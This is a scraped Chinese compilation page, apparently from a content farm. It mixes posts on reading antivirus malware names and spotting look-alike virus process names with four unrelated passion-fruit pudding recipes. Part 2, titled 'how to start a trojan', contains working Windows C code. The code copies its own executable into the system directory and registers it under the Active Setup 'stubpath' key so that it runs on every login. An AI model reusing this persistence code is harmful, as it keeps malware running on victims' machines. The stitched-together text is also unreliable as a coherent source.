教大家如何辨别木马病毒

【导语】“文春在逃编辑”通过精心收集，向本站投稿了7篇教大家如何辨别木马病毒，以下文章小编为您整理后的教大家如何辨别木马病毒，供大家阅读。

篇1：教大家如何辨别木马病毒

很多时候大家已经用各类安全软件、杀毒软件查出了自己的机子中了例如Backdoor.RmtBomb.12、Trojan.Win32.SendIP.15等等这些一串英文还带数字的病毒名，这时有些人就蒙了，那么长一串的名字，我怎么知道是什么]病毒啊？

其实只要我们掌握一些病毒的命名规则，我们就能通过杀毒软件的报告中出现的病毒名来判断该病毒的一些共有的特性了：一般格式为：病毒前缀名・病毒名・病毒后缀名病毒前缀是指一个病毒的种类，他是用来区别病毒的种族分类的，

教大家如何辨别木马病毒

。不同的种类的病毒，其前缀也是不同的。比如我们常见的木马病毒的前缀Trojan，蠕虫病毒的前缀是Worm等等还有其他的。

病毒名是指一个病毒的家族特征，是用来区别和标识病毒家族的，如以前著名的CIH病毒的家族名都是统一的“CIH”，振荡波蠕虫病毒的家族名是“Sasser”。病毒后缀是指一个病毒的变种特征，是用来区别具体某个家族病毒的某个变种的。一般都采用英文中的26个字母来表示，如Worm.Sasser.b就是指振荡波蠕虫病毒的变种B，因此一般称为“振荡波B变种”或者“振荡波变种B”。如果该病毒变种非常多，可以采用数字与字母混合表示变种标识。下面附带一些常见的病毒前缀的解释（针对我们用得最多的Windows操作系统）：1、蠕虫病毒

蠕虫病毒的前缀是：Worm，这种病毒的共有特性是通过网络或者系统漏洞进行传播，很大部分的蠕虫病毒都有向外发送带毒邮件，阻塞网络的特性。比如冲击波（阻塞网络），小邮差（发带毒邮件）等(WWW.023DN.COM)。2、系统病毒

系统病毒的前缀为：Win32、PE、Win95、W32、W95等。这些病毒的一般共有的特性是可以感染windows操作系统的*.exe和*.dll文件，并通过这些文件进行传播。如CIH病毒。3、木马病毒、病毒

木马病毒其前缀是：Trojan， 病毒前缀名一般为Hack。木马病毒的共有特性是通过网络或者系统漏洞进入用户的系统并隐藏，然后向外界泄露用户的信息，而 病毒则有一个可视的界面，能对用户的电脑进行远程控制。木马、病毒往往是成对出现的，即木马病毒负责侵入用户的电脑，而 病毒则会通过该木马病毒来进行控制。现在这两种类型都越来越趋向于整合了。一般的木马如QQ消息尾巴木马Trojan.QQ3344，还有大家可能遇见比较多的针对网络游戏的木马病毒如Trojan.LMir.PSW.60。

篇2：教大家如何启动木马

很多人在问如何实现ACTIVEX 木马启动，其实很简单，

mycode:

// blog:www.54rk.cn

#include “stdafx.h”

#define ACTIVE_SETUP “SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{450D8FBA-AD25-11D0-98A8-0800361B1175}”

int APIENTRY WinMain(HINSTANCE hInstance,

HINSTANCE hPrevInstance,

LPSTR    lpCmdLine,

int      nCmdShow)

{

TCHAR szModuleName[MAX_PATH]={0};

TCHAR szDestFath[MAX_PATH];

HKEY hSubKey = 0;

GetModuleFileName(NULL,szModuleName,sizeof(szModuleName));

//获得自身的全路径

GetSystemDirectory(szDestFath, MAX_PATH);

//获取系统目录路径

strcat(szDestFath, “\\\\active.exe”);

//得到目标全路径

CopyFile(szModuleName,szDestFath,true);

//f复制自身到系统目录下

RegDeleteKey(HKEY_CURRENT_USER, ACTIVE_SETUP);

//HKEY_CURRENT_USERR中的记录，否则用户下次登录时将不再执行

RegCreateKey(HKEY_LOCAL_MACHINE, ACTIVE_SETUP, &hSubKey);

//加载ActiveX启动

RegSetValueEx(hSubKey,“stubpath”,0,REG_EXPAND_SZ,(BYTE *) szDestFath,lstrlen(szDestFath));

RegCloseKey(hSubKey);

//关闭hSubKey的对象

return 0 ;

}

/*vc6.0 xp sp3 测试通过*/

篇3：Win7 64位纯净版系统中巧妙辨别木马病毒进程和常见病

一、一般情况下，病毒都是通过下面三种方式来隐藏：

1、偷改单个字符

2、顶替系统中对应的进程名

3、将病毒运行所需的dll文件插入正常的系统进程中

二、如何辨别病毒进程

1、常见病毒的进程名称都是采用这样的命名方式：将系统中正常进程名中的o改为0，l改为i，i改为j;

2、微乎其微的进程名称的差异，用户难于发现异常，所以建议使用专业的进程检测工具;

三、常见的正常进程与病毒进程对比

比如：系统中的正常进程有：svchost.exe、explorer.exe、iexplore.exe、winlogon.exe等，而病毒通常会对应这样命名：svch0st.exe、explore.exe、iexplorer.exe、winlogin.exe，

Win7 64位纯净版系统中巧妙辨别木马病毒进程和常见病

，

篇4：教大家怎么做百香果布丁

1准备好食材，吉利丁片提前用冷水泡软，沥干水备用。

2 2芒果肉加 牛奶加 百香果肉一起放入搅拌机搅拌。

3 3过滤一遍，把百香果的果核滤出。

4 4过滤出的芒果液，加入白糖，放锅里小火加热，边加热边搅拌，拌至白糖融化即可，不用烧开。

晾至50度左右，加入吉利丁片搅拌融化。

5 5再过滤一遍

6 6倒入布丁模，放入冰箱冷藏一晚上即可。

篇5：教大家怎么做百香果布丁

1、百香果洗干净,取出果肉,用过滤网勺去子留汁备用.芒果去皮，切丁待用。

2、2/3的芒果丁和淡奶油放入搅拌机中搅拌成非常顺滑的果泥。

3、牛奶加砂糖高火叮90秒，取出投入吉利丁片，搅拌使其溶化。

百香果布丁步骤1-3

百香果布丁步骤4-6

百香果布丁步骤7-9

4、将芒果泥,百香果汁,倒入稍冷却的牛奶中混合搅拌均匀。

5、装入布丁模具中，在每个模具里面投入剩下的芒果丁。

6、放入冰箱冷藏至凝固约2小时即可。

篇6：教大家怎么做百香果布丁

牛奶220克加入30克细砂糖，加热过程中拌匀，牛奶温热就关火。

02

百香果选取两个，要表皮有些皱巴巴的才是熟透的。

03

两个百香果过滤出汁水30克。

04

牛奶加入两个打散的鸡蛋，再倒入30克百香果汁拌匀。

05

布丁液最好过滤3次，这样才够细腻，可以去掉蛋丝。

06

用水浴法，160度烤40分钟。

所谓水浴法，就是在烤盘中加入一半的`开始，把耐高温的布丁碗放入其中，中层烘烤。

07

这是烤好的布丁，黄橙橙的如蛋黄般柔软细腻。

表面可以撒上些百香果籽。

篇7：教大家怎么做百香果布丁

美食小提示

1、芒果要选用气味芳香浓烈。

2、融化吉利丁时我用微波炉加热，其实用炉火加热肯定也是可以的。

3、食用前要冷藏，口感才好。

4、百香果味道较酸,根据个人耐酸都加减糖粉.

★ 关于怎么辨别职场小人

★ 辨别事物的作文

★ 给大家的感谢信.

★ 教你5招辨别优质蜂蜜

★ 易如反掌！手工查杀木马病毒方法揭谜

★ 辨别自己理想中的工作

★ 怎样辨别“真市场”还是“假市场”？

★ 大家新年快乐作文

★ 为大家服务作文

★ 文明城市大家创作文